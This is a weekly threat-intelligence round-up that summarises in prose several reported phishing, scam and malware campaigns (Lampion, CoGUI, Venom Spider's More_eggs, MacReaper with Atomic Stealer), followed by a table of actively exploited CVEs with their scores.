The Silobreaker Weekly Geopolitical Risk Briefs

Download Report

Weekly Cyber Round-up

Intelligence Report

May 8, 2025

Lampion malware campaign leverages ClickFix technique to target Portuguese organisations

Between late 2024 and early 2025, Palo Alto Networks Unit 42 researchers observed a malicious campaign leveraging ClickFix lures to deliver Lampion malware to Portuguese organisations within the government, finance, and transportation sectors. The campaign adopts similar patterns used in previous Lampion campaigns, including the use of highly obfuscated VBScripts and social engineering themes. The infection chain used in the campaign was divided into several non-consecutive stages and executed as separate processes that would appear benign in isolation. Victims were initially sent a phishing email with a ZIP attachment containing an HTML file, which redirected to a website spoofing a Portuguese tax authorityAfter execution of the first stage, an obfuscated second-stage downloader, disguised as a PHP file, is written in the TEMP folder. The third stage is responsible for reconnaissance and detection evasion measures, and creates an execution method for the fourth stage, a DLL loader.

Get the alert delivered directly to your inbox

CoGUI phishing kit targets organisations in Japan

Proofpoint researchers observed an increase in high-volume Japanese language phishing campaigns targeting organisations in Japan to deliver a phishing kit called CoGUI. The campaigns primarily impersonate popular consumer or payment brands, such as Amazon, PayPal, Rakuten, and others, and aim to steal usernames, passwords, and payment data. Several other campaigns were also observed targeting users in Australia, New Zealand, Canada, and the United States. CoGUI has been active since at least October 2024 and uses several advanced defence evasion techniques. Before serving the phishing page, CoGUI uses victim profiling, though this often varies by campaign.CoGUI is likely used by multiple different Chinese-speaking threat actors. The researchers also observed similarities between CoGUI and recent Darcula road toll smishing attacks but stated that Darcula is unrelated to CoGUI and its presence in road toll smishing is notably different. 

Mystery box subscription scams leverage Facebook pages and ads for financial gain

Bitdefender researchers identified an increase in campaigns leveraging sophisticated fraudulent websites to facilitate subscription scams. The threat actors create Facebook pages and ads impersonating content creators to promote the ‘mystery box’ scam, alongside other variants. The scam has recently evolved to include a subscription model that, for a recurring payment, seemingly provides the user with exclusive deals and savings. Several techniques have also been adopted to evade automatic detection, including leveraging multiple versions of an ad, with only one being malicious, uploading images directly from Google Drive, using cropped images to alter visual patterns, featuring text only in images, and leveraging classic homoglyph techniques. Over 200 websites have been observed as part of the campaign, some of which are still in operation. Some of the account pages are newly created, while others are being hacked and taken over by the attackers.

Venom Spider leverages server polymorphism in More_eggs deployment

Since at least October 2023, Arctic Wolf researchers have observed a spear phishing campaign by the financially motivated threat group Venom Spider targeting hiring managers and corporate human resources departments. The campaign abuses legitimate messaging services and job platforms to apply for real jobs using fake resumes that deliver an enhanced version of the More_eggs backdoor. Spear phishing emails sent directly to the victim contain links that redirect to an attacker-controlled website where they are asked to complete a CAPTCHA challenge. If completeda ZIP file is downloaded, containing a decoy image and a malicious LNK file disguised as a resume. The LNK launches a batch script which triggers a JavaScript payload that drops a complex executable library, dubbed More_eggs_DropperOnce active, More_Eggs establishes C2 communication to facilitate the execution of various commands.

MacReaper watering hole campaign targets macOS users with Atomic Stealer

BadByte researchers discovered a watering hole campaign, dubbed MacReaper, targeting macOS users with Atomic Stealer malware. The campaign was initially discovered on May 4th, 2025, through a compromised Brazilian news site. The researchers identified approximately 2,800 potentially compromised websites, suggesting the presence of a coordinated operation that is likely exploiting vulnerabilities in website hosting or content management systems. The campaign targets users with a ClickFix fake reCAPTCHA interface, which triggers a Binance Smart Contract leveraging the EtherHiding technique to deliver a base-64 encoded command to the clipboard. Users are prompted to run the command via macOS-specific shortcuts, which downloads a script that retrieves Atomic Stealer.

High Priority Vulnerabilities

name Software Base
Score
Temp
Score
CVE-2025-27363 FreeType 8.1 5.6
Related: Google patches actively exploited flaw in Android devices
CVE-2024-7399 MagicINFO 9 Server 8.8 8.4
Related: Unauthenticated RCE flaw in Samsung MagicINFO 9 Server actively exploited
CVE-2025-3248 langflow 9.8 7.0
Related: Critical Langflow Flaw Added to CISA KEV List Amid Ongoing Exploitation Evidence
CVE-2024-6047 GVLX 4 V3 9.8 9.8
Related: Critical command injection flaws in discontinued GeoVision devices actively exploited
CVE-2025-34028 Command Center Innovation 10.0 7.3
Related: Commvault CVE-2025-34028 Added to CISA KEV After Active Exploitation Confirmed

Get the full report
delivered to your inbox​

By filling out and submitting this request you give us your consent to use and store the information  you have provided for the purpose set out above or in connection with it. For more information, see our Privacy Policy.